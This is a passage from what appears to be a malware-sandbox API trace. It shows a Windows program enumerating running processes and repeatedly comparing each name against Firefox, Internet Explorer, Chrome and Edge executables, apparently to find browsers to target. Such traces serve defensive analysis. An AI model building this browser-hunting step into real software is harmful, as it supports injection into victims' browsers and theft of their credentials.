lpString2="chrome.exe") returned 1 [0179.193] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0179.193] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.194] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0179.194] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0179.194] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0179.194] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.194] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.194] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0179.194] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0179.194] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0179.194] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.194] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.195] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0179.195] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0179.195] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0179.195] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.195] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.195] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0179.195] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0179.196] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0179.196] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.196] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.196] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0179.196] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0179.196] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0179.196] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.196] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.197] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0179.197] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0179.197] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0179.197] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.197] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.197] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0179.197] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0179.197] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0179.197] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.197] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0179.198] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0179.198] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0179.198] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0179.198] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.198] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.198] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.198] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.198] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.198] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.198] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.199] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.199] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.200] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.200] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.200] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.200] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.200] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.200] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.200] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.201] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.201] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.201] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.201] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.201] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.201] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0179.201] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0179.201] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0179.201] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.201] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.202] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.202] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.202] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.203] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0179.203] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0179.203] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0179.203] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.203] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.203] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0179.203] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0179.203] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0179.203] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.204] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0179.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0179.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0179.204] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.204] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.205] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.205] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.205] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.205] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.205] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0179.205] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0179.205] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0179.205] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0179.206] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0179.206] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0179.206] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0179.206] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0179.206] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0179.206] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0179.206] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0179.206] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0179.207] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0179.207] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0179.207] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0179.207] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.207] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0179.207] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0179.208] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0179.208] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0179.208] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0179.208] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0179.208] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0179.208] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0179.208] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0179.209] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0179.209] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0179.209] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0179.209] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0179.209] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0179.209] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0179.209] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0179.209] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0179.210] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0179.210] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0179.210] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0179.210] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.210] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0179.210] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0179.210] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0179.210] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0179.210] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.210] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0179.211] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0179.211] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0179.211] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0179.211] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.211] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0179.211] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0179.211] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0179.212] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0179.212] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.212] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0179.212] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0179.212] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0179.212] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0179.212] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.212] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0179.213] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0179.213] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0179.213] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0179.213] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.213] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0179.213] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0179.213] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0179.213] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0179.213] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.213] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0179.214] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0179.214] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0179.214] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0179.214] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0179.214] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0179.214] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0179.214] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0179.214] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0179.215] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0179.215] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0179.215] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0179.215] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.215] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0179.215] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0179.215] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0179.216] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0179.216] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0179.216] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0179.216] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0179.216] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0179.216] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0179.217] 